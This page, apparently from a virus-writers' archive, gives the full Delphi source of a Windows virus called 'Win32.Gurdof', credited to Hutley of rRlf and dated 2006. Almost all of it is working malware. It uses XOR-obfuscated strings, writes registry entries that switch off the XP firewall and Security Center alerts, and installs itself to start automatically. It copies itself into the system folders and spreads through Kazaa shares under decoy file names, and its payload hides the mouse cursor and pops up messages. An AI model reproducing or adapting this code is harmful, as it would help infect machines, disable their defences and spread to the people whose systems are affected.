| ||||||||||||||||
Win32.Gurdof
by Hutley
See also the project folder program gurdof; //{$APPTYPE CONSOLE} { /////////////////////////////////////////////////////////////////////// Win32.Gurdof by Hutley/RRLF This is my first virus in RRLF (Ready Rangers Liberation Front) Team. //////////////////////////////////////////////////////////////////////// What Win32.Gurdof doing: + Fuck the WinXP Firewall + Simple Function that Decode the Strings + Disable Notifications of Security Center + Infect Kazaa Program + Payload: Sort Randomly a Number Until 20, if the number be < 14 then show messages and hide the mouse icon. Comment: IS VERY SIMPLE I KNOW. I TERMINETED IT BECAUSE I GO START THE STUDY OF ASSEMBLY LANGUAGE. WAIT, COMMING SOON NEWS VIRUSES IN ASM32. Hutley / rRlf - The Psychodelic Virus Writer 24 - Feb - 2006 -*- BRAZIL! } uses Windows, Registry, SysUtils, Dialogs; const vir_name: string = 'Win32.Gurdof'; made_by: string = 'Hutley of rRlf VX Team'; var ExeName: array[0..260] of Char; start_: TRegistry; function code_(text: string; chave: integer): string; var lp1, p: integer; fuck: string; begin lp1 := strlen(pchar(text)); for p := 1 to lp1 do begin fuck := fuck + chr(ord(text[p]) xor chave) end; code_ := fuck end; function WinDir: string; begin SetLength(Result, MAX_PATH); Windows.GetWindowsDirectory(PChar(Result), MAX_PATH); Result := string(PChar(Result)) + '\'; end; function SysDir: string; begin SetLength(Result, MAX_PATH); if GetSystemDirectory(PChar(Result), MAX_PATH) > 0 then Result := string(PChar(Result)) + '\' else Result := ''; end; procedure fuck_xp_firewall; var ffw: TRegistry; begin ffw := TRegistry.Create; ffw.RootKey := HKEY_LOCAL_MACHINE; // Part 1 ffw.OpenKey(code_('Q[QVGO^AwppglvAmlvpmnQgv^Qgptkagq^QjcpgfCaagqq^Rcpcogvgpq^DkpgucnnRmnka{^FmocklRpmdkng', 2), FALSE); ffw.WriteFloat(code_('GjpbaofMlwjej`bwjlmp', 3), 1); ffw.WriteFloat(code_('AjefhaBmvasehh', 4), 0); ffw.WriteFloat(code_('@kJkpEhhksA|gatpmkjw', 5), 0); ffw.CloseKey; // Part 2 ffw.OpenKey(code_('U_URCKZEsttchrEihrtijUcrZUctpoecuZUngtcbGeecuuZVgtgkcrctuZ@otcqgjjVijoeZUrghbgtbVti`ojc', 6), false); ffw.WriteFloat(code_('La{ijdmFg|anaki|agf{', 8), 1); ffw.WriteFloat(code_('OdkhfoLcxo}kff', 10), 0); ffw.WriteFloat(code_('OdEdJggd|Nshn{bdex', 11), 0); ffw.CloseKey; // Part 3 ffw.OpenKey(code_('Xdm|jynWFbhydxdmWXnh~ybr+Hneny', 11), false); ffw.WriteFloat(code_('Kd~c\cxyNcykhfoDe~cls', 10), 1); ffw.WriteFloat(code_('O`{l~heeM`zhkelGf}`op', 9), 1); ffw.WriteFloat(code_('If|a^az}{G~mzzalm', 8), 1); ffw.WriteFloat(code_('AnubpfkkHqbuuncb', 7), 1); ffw.CloseKey; // End ffw.Free; end; procedure infect_p2p_kazaa; var kazaa: TRegistry; begin kazaa := TRegistry.Create; kazaa.RootKey := HKEY_CURRENT_USER; if kazaa.OpenKey(code_('Ui`rqgtcZMG\GGZJiegjEihrchrZ', 6), false) then begin kazaa.WriteFloat(code_('Alvdgi`Vmdwlkb', 5), 0); kazaa.WriteString(code_('@mv4', 4), WinDir); kazaa.WriteString(code_('@mv5', 4), WinDir + code_('Pkbqf', 3)); GetModuleFileNameA(0, ExeName, SizeOf(ExeName)); CreateDir(WinDir + code_('Jqxk|E', 25)); CopyFile(ExeName, PChar(WinDir + code_('G|ufqHg}g`qfKraw}zsK}zKvx{zpq:~ds:qlq', 20)), True); CopyFile(ExeName, PChar(WinDir + code_('F}tgpIwtwlJf|apgJ|{Jwpq;er;pmp', 21)), True); CopyFile(ExeName, PChar(WinDir + code_('DverKgrsxHp~e{?&"nx>Hqbt|~yp9}gp9ror', 23)), True); CopyFile(ExeName, PChar(WinDir + code_('Kpyj}DuaG{wmkqvGqvG~yuqtaG`@`6rh6}`}', 24)), True); CopyFile(ExeName, PChar(WinDir + code_('Ir{hFvixs{tiE|oyqE|oyqE|oyqE|oyq4pj}4b', 26)), True); end; kazaa.Free; end; function show_cursor(const Show: boolean): boolean; var I: integer; begin I := ShowCursor(LongBool(true)); if Show then begin Result := I >= 0; while I < 0 do begin Result := ShowCursor(LongBool(true)) >= 0; Inc(I); end; end else begin Result := I < 0; while I >= 0 do begin Result := ShowCursor(LongBool(false)) < 0; Dec(I); end; end; end; procedure my_payload; var i: integer; begin Randomize; if Random(50) <= 14 then begin for i := 1 to 10 do begin ShowMessagePos(code_('===<[INXSZ<sKrF<eSi<===', 28) + #13#13 + code_('=============Uhiqxd=2=OOQ[', 29), Random(800), Random(600)); show_cursor(false); end; end; end; begin // Install In Registry - Auto Start start_ := TRegistry.Create; start_.RootKey := HKEY_LOCAL_MACHINE; start_.OpenKey(code_(']ahzyo|kRCgm|a}ahzRYg`jay}RM{||k`zXk|}ga`R\{`', 14), true); start_.WriteString('Gurdof', code_('D[I[[[ MPM', 40)); start_.Free; // Module of Current .Exe GetModuleFileNameA(0, ExeName, SizeOf(ExeName)); // System Dir - 2 Copies of Virus CopyFile(ExeName, PChar(SysDir + code_('D[I[[[ MPM', 40)), true); CopyFile(ExeName, PChar(SysDir + code_('IEGKDN ORO', 42)), true); // Win Dir - 2 Copies of Virus CopyFile(ExeName, PChar(WinDir + code_('[EBHC[_ ITI', 44)), true); CopyFile(ExeName, PChar(WinDir + code_(']W]ZKC', 46)), true); // Desable the WinXP Firewall and Security Center fuck_xp_firewall; // Spread by Kazaa infect_p2p_kazaa; // A Simple Payload my_payload; end. |